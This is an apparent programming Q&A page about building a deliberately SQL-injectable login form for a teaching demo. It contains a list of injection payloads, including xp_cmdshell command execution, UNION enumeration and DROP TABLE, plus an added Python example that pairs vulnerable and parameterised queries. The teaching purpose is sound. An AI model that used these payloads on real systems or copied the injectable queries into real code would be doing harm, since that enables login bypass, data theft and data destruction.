
I want to create a simple login and registration form, that allows me to demonstrate SQL injection, but I haven't been able to do so currently. Every time I attempt a sample form, SQLmap can't attack it. Can somebody give me a very simple and basic login and registration form that I can use to demonstrate SQL injection?

  • First time user inquiring about MySQL injection. Idk about this.. Commented Jul 12, 2011 at 15:46
  • I was at a college camp, and my topic was SQL injection. I can assure you, I wasn't using it for malicious reasoning. Commented Dec 13, 2011 at 3:07

3 Answers


Just run the simplest unprotected query:

// Deliberately injectable: the form fields are pasted straight into the SQL text,
// inside the string literals that the payloads below expect to break out of.
$query = "SELECT * FROM users WHERE username = '".stripslashes($_POST['username'])."' AND password = '".stripslashes($_POST['password'])."'";

and enjoy! The stripslashes() part is there in case you haven't disabled magic_quotes already (as you should have), to undo the automatic escaping; otherwise you'll have the purest injectable input. Just pick up any SQL injection you might find on the internet and see. Some examples:

' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`

And so on


2 Comments

Which would only be useful on prehistoric/poorly-installed PHPs that have magic_quotes_gpc enabled.
@Marc B They are still around... Some of my company's clients have servers with PHP 4, others PHP 5.1, and many have magic_quotes_gpc turned ON (and websites in Mambo CMS *shivers*)

If you like a massive SQL test, there is a library that helps me sometimes: http://sqlmap.sourceforge.net

It runs a lot of SQL injection tests and returns a great report.



Google for some pre-existing pages, e.g.:

http://www.greensql.net/node/3

Alternatively, you could just create a basic search box that searches a table in the DB. Fill the table with random names and demonstrate how the search works and how SQL injection can drop the table, etc.
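A runnable version of what the first answer's concatenated login query and the search-box suggestion above actually do, added here as an example that is not part of the original answers. It uses Python's sqlite3 in place of MySQL, a constructed two-user table, and `executescript()` as a stand-in for a database driver with multi-statement execution enabled (sqlite3's `execute()` refuses a second statement, so stacked queries need it); the function names and sample accounts are the example's own. Each vulnerable function sits beside its parameterised form so the payloads from the answer can be tried against both.

```python
import sqlite3

# Constructed sample accounts for the demo (not data from the page).
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory SQLite database with a users table seeded from USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """The answer's PHP query, one-to-one: form fields are concatenated into the SQL text.
    Returns the matched username, or None when the WHERE clause matches nothing."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the input can never change the query's shape."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def vulnerable_search(conn, term):
    """The search box from the last answer, built by string concatenation.
    A UNION inside `term` makes the box return columns it was never meant to show."""
    sql = "SELECT username FROM users WHERE username LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def vulnerable_search_stacked(conn, term):
    """Same concatenated query, run through executescript(), which executes every
    statement in the string. That models a driver with multi-statement support
    enabled and is what lets "'; DROP TABLE users; --" actually drop the table."""
    sql = "SELECT username FROM users WHERE username LIKE '%" + term + "%'"
    conn.executescript(sql)


def safe_search(conn, term):
    """Parameterised search. Caveat: binding stops injection, but `%` and `_` inside
    `term` are still LIKE wildcards, so escape them separately if that matters."""
    sql = "SELECT username FROM users WHERE username LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",)).fetchall()]


def table_exists(conn, name):
    """True if a table with this name is still present in the schema."""
    sql = "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    # Payloads from the first answer, typed into the form fields.
    print(vulnerable_login(conn, "' or 1=1--", "anything"))   # alice: password never checked
    print(vulnerable_login(conn, "bob'--", ""))                # bob: rest of the query commented out
    print(safe_login(conn, "' or 1=1--", "anything"))          # None
    print(vulnerable_search(conn, "' UNION SELECT password FROM users --"))  # names and passwords
    print(safe_search(conn, "' UNION SELECT password FROM users --"))        # []
    vulnerable_search_stacked(conn, "'; DROP TABLE users; --")
    print(table_exists(conn, "users"))                         # False
```

The `--` payloads work here because SQLite, like MySQL, treats `--` as a line comment, which discards the `AND password = '...'` tail the form appended; the UNION payload works because the attacker controls the whole statement after the string literal closes.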
